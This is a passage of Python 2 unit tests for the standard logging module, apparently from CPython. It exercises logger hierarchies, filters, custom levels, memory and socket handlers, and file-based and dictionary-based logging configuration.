('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_invalid_name(self):
self.assertRaises(TypeError, logging.getLogger, any)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warn(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = cStringIO.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('foo')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
class LogRecordStreamHandler(StreamRequestHandler):
"""Handler for a streaming logging request. It saves the log message in the
TCP server's 'log_output' attribute."""
TCP_LOG_END = "!!!END!!!"
def handle(self):
"""Handle multiple requests - each expected to be of 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally."""
while True:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unpickle(chunk)
record = logging.makeLogRecord(obj)
self.handle_log_record(record)
def unpickle(self, data):
return cPickle.loads(data)
def handle_log_record(self, record):
# If the end-of-messages sentinel is seen, tell the server to
# terminate.
if self.TCP_LOG_END in record.msg:
self.server.abort = 1
return
self.server.log_output += record.msg + "\n"
class LogRecordSocketReceiver(ThreadingTCPServer):
"""A simple-minded TCP socket-based logging receiver suitable for test
purposes."""
allow_reuse_address = 1
log_output = ""
def __init__(self, host='localhost',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler):
ThreadingTCPServer.__init__(self, (host, port), handler)
self.abort = False
self.timeout = 0.1
self.finished = threading.Event()
def serve_until_stopped(self):
while not self.abort:
rd, wr, ex = select.select([self.socket.fileno()], [], [],
self.timeout)
if rd:
self.handle_request()
# Notify the main thread that we're about to exit
self.finished.set()
# close the listen socket
self.server_close()
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.tcpserver = LogRecordSocketReceiver(port=0)
self.port = self.tcpserver.socket.getsockname()[1]
self.threads = [
threading.Thread(target=self.tcpserver.serve_until_stopped)]
for thread in self.threads:
thread.start()
self.sock_hdlr = logging.handlers.SocketHandler('localhost', self.port)
self.sock_hdlr.setFormatter(self.root_formatter)
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.tcpserver.abort = True
del self.tcpserver
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
for thread in self.threads:
thread.join(2.0)
finally:
BaseTest.tearDown(self)
def get_output(self):
"""Get the log output as received by the TCP server."""
# Signal the TCP receiver and wait for it to terminate.
self.root_logger.critical(LogRecordStreamHandler.TCP_LOG_END)
self.tcpserver.finished.wait(2.0)
return self.tcpserver.log_output
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
logger.debug("eggs")
self.assertEqual(self.get_output(), "spam\neggs\n")
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fn = tempfile.mktemp(".log")
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn)
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn)
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = u'\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = cStringIO.StringIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, '\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
def test_encoding_utf16_unicode(self):
# Issue #19267
log = logging.getLogger("test")
message = u'b\u0142\u0105d'
writer_class = codecs.getwriter('utf-16-le')
writer_class.encoding = 'utf-16-le'
stream = cStringIO.StringIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
s = stream.getvalue()
self.assertEqual(s, 'b\x00B\x01\x05\x01d\x00\n\x00')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
try:
warnings.filterwarnings("always", category=UserWarning)
file = cStringIO.StringIO()
h = logging.StreamHandler(file)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = file.getvalue()
h.close()
self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)
#See if an explicit file uses the original implementation
file = cStringIO.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
file, "Dummy line")
s = file.getvalue()
file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
finally:
logging.captureWarnings(False)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
